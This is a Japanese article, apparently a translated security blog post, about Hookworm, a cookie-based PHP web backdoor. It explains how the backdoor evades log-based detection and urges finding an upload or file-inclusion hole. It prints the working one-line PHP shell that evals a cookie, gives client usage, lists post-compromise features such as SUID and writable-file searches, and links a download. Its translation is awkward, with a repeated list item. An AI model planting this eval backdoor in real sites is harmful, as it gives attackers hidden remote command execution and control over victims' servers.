Weevelyだとか 、最近ではWeBaCoo に関する記事を覚えているのなら、私たちが何の話をするのかおわかりだろう。そう - ステルス、クッキーベース、Webバックドアだ。今回はフックワームについてだ。
リモートシェルスクリプトバックドアを使用する状況といえば、リモートサーバ上にコマンドを発行しやすくしたい時だ。その機能は様々で、プログラミング言語も様々、サイズも様々だ。URLの引数を評価するシンプルなスクリプトもあり、関数を使ってそれらを実行し、結果をWebページに表示し、ポイント・アンド・クリックによる操作を備えた複雑なユーザーインターフェイスで、陥落後の多くアクティビティをこなしてくれる。URLの引数を評価するスクリプトの問題点は、どんなシェルが使用されたのかという証拠を多量のログファイルとして残してしまうことだ。第二に、それらのほとんどは、アップロードされたサーバ上のコマンドサポートにおける、静的な性質に依存して構築されている。HTTP GETおよびPOST変数は簡単に観測でき、検出や監査証跡の形成をしやすくしてしまうだろう。
こういった不安要素すべてを念頭において、 Hookworm製作者 - Mr.ジャスティンクラインキーンは、より巧妙なバックドアの構築にとりかかった。彼は、悪意のあるペイロードを運ぶために使用できる、クライアントとサーバー間で渡される数多くの見落とされがちなHTTP変数が存在することに気付いた。Hookwormは、単にブラウザによって送信されたクッキーを探して、クッキーのペイロードの制約にもかかわらず、大規模なデータを送信するために、クッキー、任意の数の間の応答を分割することによって応答します。クッキーが持つのは限られたデータを運ぶ能力で、容量には制限がある(4096バイト)。しかし、RFC 2109によれば、サイトがクライアントに設定できるCookieの数の制限は、非常に高くなっている。これはクライアントが制御するものなので、数字は、あなたの望むままにできてしまう!
では、どのように実際に鉤虫を実行するのだろう?あなたがする必要があるのは、ターゲットシステム上のファイルを編集できるような、PHPアプリケーションの脆弱性を見つけることだ。SQLインジェクション脆弱性の発見なら、私に任せて。ファイルのアップロード、あるいはリモートファイルインクルージョンが動作するものだろうと、見つけることは難しくない。
<?php if(isset($_COOKIE['c'])) {eval($_COOKIE['c']); echo $_COOKIE['d'] . $r . $_COOKIE['d'];}?>
を対象となるWebページへ追加すればいい。ここで、'c'のcookieがペイロードコマンドを運ぶのに対して、'd'のcookieは区切り文字を保持し、クライアントが余分なHTMLを取り除いて表示できるようになっている。このコードが、ホストのPHPページに注入されると、Hookwormのデータは応答の中にカプセル化され、Hookwormクライアントによって簡単に解釈できるようになる。次のコマンドラインで鉤虫PHPクライアントを実行する:
$ php hookworm.php
スクリプトの相対パスによる、接続用IPを入力するよう求められる。スクリプトの場所を指示すれば出来上がりだ!シェルは君のものだ!
フックワームが備えているコマンド:
- shell_exec()とを介してコマンドをフォークする
- PHPのコマンドを発行する
- すべての。htaccessファイルを見つける
- すべての。htaccessファイルを見つける
- すべてのSUIDファイルを見つける
- ファイル名の[名前]を持つすべてのファイルを見つける
- すべての書き込み可能なファイルとフォルダを見つける
- マシン上で開いているポートを表示する
フックワームによる利点は、アップロードするファイルサイズの制限をあまり心配する必要がないことだ。セキュアな、HTTPSチャネルで接続すると、長い時間にわたるコントロールを設定できます。一旦"インストール"されてしまえば、システム上のhookwormを検出することは、ファイル変更の監視やHTTP / HTTPSリクエストを介して入ってくるクッキー検査を除けば、非常に困難になる、。
このツールは、概念の実証としてのみ開発されたものであり、悪意のある目的を意図したものではないことを念頭におく必要がある。
Download Hookworm:
Hookworm v1.0 – hookworm.php/hookworm.php.tar.gz – http://www.madirish.net/sites/default/files/hookworm.php.tar.gz
